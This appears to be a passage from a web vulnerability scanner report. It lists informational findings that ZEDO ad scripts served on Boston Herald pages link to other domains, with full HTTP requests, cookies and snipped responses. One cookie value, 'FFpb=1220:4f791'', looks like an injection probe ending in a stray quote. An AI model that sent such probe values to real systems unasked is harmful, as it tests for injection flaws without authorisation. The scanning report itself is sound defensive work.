Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1; FFcat=826,187,7:951,7,7:951,2,7; FFad=1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644|0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1; PI=h1037004Za883603Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:826,196642|0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1;expires=Mon, 28 Feb 2011 14:31:35 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,10,9:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1;expires=Mon, 28 Feb 2011 14:31:36 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sat, 29 Jan 2011 14:32:24 GMT
Date: Sat, 29 Jan 2011 14:31:36 GMT
Connection: close
Content-Length: 4384

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856417/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.172. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=7&q=&$=&s=2&z=0.23845157260075212

The response contains the following link to another domain:

http://redcated/APM/iview/267856416/direct;wi.160;hi.600/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=7&q=&$=&s=2&z=0.23845157260075212 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196641:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Sat, 29 Jan 2011 13:40:41 GMT
Date: Sat, 29 Jan 2011 13:39:47 GMT
Connection: close
Content-Length: 4385

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856416/direct;wi.160;hi.600/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.173. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.31822958169505

The response contains the following link to another domain:

http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=' + Math.random() + '?

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.31822958169505 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; FFcat=826,187,9:951,7,9:1220,101,9; FFad=0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:31 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=249
Expires: Fri, 28 Jan 2011 22:01:40 GMT
Date: Fri, 28 Jan 2011 21:57:31 GMT
Connection: close
Content-Length: 2167

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

17.174. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=11/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.45605201134458184

The response contains the following link to another domain:

http://redcated/APM/iview/267856421/direct;wi.728;hi.90/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=17%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=17%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=17%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=

Request

GET /bar/v16-401/d3/jsc/fm.js?c=11/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.45605201134458184 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:14,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,7,9:951,2,9:826,187,14:951,7,14:951,11,14:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=52:27:24:34:14:16:2:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:24,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,2,9:951,7,14:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=35:17:52:27:24:14:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196647,196644:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:23:22 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:23:22 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Sat, 29 Jan 2011 02:24:28 GMT
Date: Sat, 29 Jan 2011 02:23:22 GMT
Connection: close
Content-Length: 4588

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856421/direct;wi.728;hi.90/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=17%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=17%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=17%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.175. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.7758457127492875

The response contains the following link to another domain:

http://redcated/APM/iview/267856421/direct;wi.728;hi.90/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.7758457127492875 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:14,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,7,9:951,2,9:826,187,14:951,7,14:951,11,14:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=52:27:24:34:14:16:2:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:24,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,7,14:826,187,9:951,7,9:951,2,9:951,11,14:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=35:15:52:27:24:16:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196647,196644:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:23:23 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:23:23 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Sat, 29 Jan 2011 02:24:29 GMT
Date: Sat, 29 Jan 2011 02:23:23 GMT
Connection: close
Content-Length: 4615

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856421/direct;wi.728;hi.90/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.176. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=realmedia728x90&s=2&z=0.688481671968475

The response contains the following link to another domain:

http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=728x90;ord=' + Math.random() + '?

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=realmedia728x90&s=2&z=0.688481671968475 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
